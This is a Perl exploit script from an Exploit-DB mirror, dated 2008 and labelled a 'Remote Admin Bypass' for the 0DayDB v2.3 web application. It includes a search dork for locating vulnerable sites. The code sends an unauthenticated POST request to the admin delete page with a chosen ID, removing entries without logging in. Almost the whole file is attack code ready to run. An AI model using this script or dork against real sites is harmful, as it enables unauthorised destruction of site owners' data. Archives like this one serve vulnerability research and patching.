exploit-db-mirror/exploits/php/webapps/4896.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
825 B
Perl
Executable file

#!/usr/bin/perl
#Autor : Pr0metheuS
#Script : 0DayDB v2.3
#Version : v2.3
#Dork : "Powered By 0DayDB v2.3"
#Gr33tz-Team.org
use LWP::UserAgent;
if(@ARGV!=3){
print "*****************\n";
print "0DayDB v2.3 Remote Admin Bypass\n";
print "perl $0 <site> <path> <id>\n";
print "downloads ID for delete\n";
print "*****************\n";
}
($site,$path,$id)=@ARGV;
sub pri {
print "*****************\n";
print "[+] Exploit completed\n";
print "*****************";
}
sub con {
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => "".$site."".$path."/acp/delete.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("id=".$id."");
$res = $ua->request($req);
if ($res->is_success) {
pri();
}
}
con();
# milw0rm.com [2008-01-11]